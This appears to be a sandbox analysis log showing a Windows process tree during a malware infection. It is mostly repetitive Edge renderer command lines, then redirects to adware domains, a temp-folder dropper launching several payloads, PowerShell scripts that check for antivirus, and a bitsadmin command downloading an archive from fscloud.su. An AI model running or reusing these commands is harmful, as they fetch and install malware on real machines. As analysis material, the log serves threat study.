C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6336 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6788 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7092 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3704 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6260 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7568 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4088 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6132 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7092 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2348 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7084 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7724 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8112 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7240 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8252 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7856 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2156 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7556 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8740 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8416 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8324 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8760 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7872 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8732 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8844 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8484 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8864 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8460 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9552 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9276 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9868 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9592 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"7⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad6⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347187⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514836⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347187⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515136⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347187⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872156⤵
-
            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xdc,0x118,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd34718
          C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd34718
          C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd34718
          C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=3
            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd34718
          C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=3
            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xe0,0x104,0x108,0xa0,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd34718
          C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1339680
            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd34718
          C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1620783&var=3
            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd34718
        C:\Users\Admin\AppData\Local\Temp\41-d7994-2cf-eb2b7-baca0dabd8f6c\Jywynoxysy.exe  "C:\Users\Admin\AppData\Local\Temp\41-d7994-2cf-eb2b7-baca0dabd8f6c\Jywynoxysy.exe"
          C:\Windows\System32\cmd.exe  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o5creuck.fr2\GcleanerEU.exe /eufive & exit
            C:\Users\Admin\AppData\Local\Temp\o5creuck.fr2\GcleanerEU.exe  C:\Users\Admin\AppData\Local\Temp\o5creuck.fr2\GcleanerEU.exe /eufive
              C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 2464 -s 248
                - Program crash
                - Checks processor information in registry
                - Enumerates system info in registry
          C:\Windows\System32\cmd.exe  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4u3xpdmc.qfj\installer.exe /qn CAMPAIGN="654" & exit
            C:\Users\Admin\AppData\Local\Temp\4u3xpdmc.qfj\installer.exe  C:\Users\Admin\AppData\Local\Temp\4u3xpdmc.qfj\installer.exe /qn CAMPAIGN="654"
          C:\Windows\System32\cmd.exe  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\revwwbc0.mkz\any.exe & exit
            C:\Users\Admin\AppData\Local\Temp\revwwbc0.mkz\any.exe  C:\Users\Admin\AppData\Local\Temp\revwwbc0.mkz\any.exe
          C:\Windows\System32\cmd.exe  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qp2vmnyv.f0h\gcleaner.exe /mixfive & exit
            C:\Users\Admin\AppData\Local\Temp\qp2vmnyv.f0h\gcleaner.exe  C:\Users\Admin\AppData\Local\Temp\qp2vmnyv.f0h\gcleaner.exe /mixfive
              C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 252
                - Program crash
                - Checks processor information in registry
                - Enumerates system info in registry
          C:\Windows\System32\cmd.exe  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fi2sxdp4.efj\autosubplayer.exe /S & exit
            C:\Users\Admin\AppData\Local\Temp\fi2sxdp4.efj\autosubplayer.exe  C:\Users\Admin\AppData\Local\Temp\fi2sxdp4.efj\autosubplayer.exe /S
              - Loads dropped DLL
              - Drops file in Program Files directory
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"
                - Checks for any installed AV software in registry
                - Checks processor information in registry
                - Enumerates system info in registry
              C:\Windows\SysWOW64\bitsadmin.exe  "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                - Download via BitsAdmin
